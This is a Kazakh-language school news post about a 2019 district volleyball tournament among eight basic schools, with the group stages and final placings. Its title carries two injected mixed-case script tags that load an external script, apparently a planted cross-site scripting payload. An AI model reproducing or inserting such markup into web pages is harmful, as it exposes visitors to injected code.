Аудандық "Жастар - 2019" волейбол жарысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2019

«Жастар – 2019» аудандық волейбол жарысы

20 ақпан күні Гастелло ауылында яғни «Гастелло орта мектебінде» аудандық «Жастар - 2019» негізгі мектептер арсында волейбол ойынынан жарыс ұйымдастырылды. Барлығы 8 мектеп қатысты. Оларды атап өтетін болсақ: Зерноград НМ, Тассуат НМ, Львов НМ, Нахым НМ, Отрад НМ, Қарасу НМ, Кен НМ және Өмірлік НМ. Барлық командаларды екі кіші топтарға бөлді. Бірінші кіші топқа: Тассуат НМ, Нахым НМ, Кен НМ, Өмірлік НМ мектептері жатса, екінші кіші топқа Зерноград НМ, Львов НМ, Отрад НМ, Қарасу НМ жатты. Финалға 4 мектеп Тассуат НМ, Зерноград НМ, Өмірлік НМ және Қарасу НМ шықты. 4 және 3 орынға Тассуат НМ және Зерноград НМ ойнаса, 1 және 2 орынға Өмірлік НМ және Қарасу НМ ойнады. Қорытындылай келе 1 орынға Өмірлік НМ, 2 орынға Қарасу НМ, 3 орынға Зерноград НМ жүлделі орындарға ие болды.

 

Өмірлік негізгі мектебінің

дене шынықтыру пәнінің мұғалімі: Амангелдин Е.Ж.

Просмотров: 818


Пікір қосу



Деректерді қолтаңбаға қосу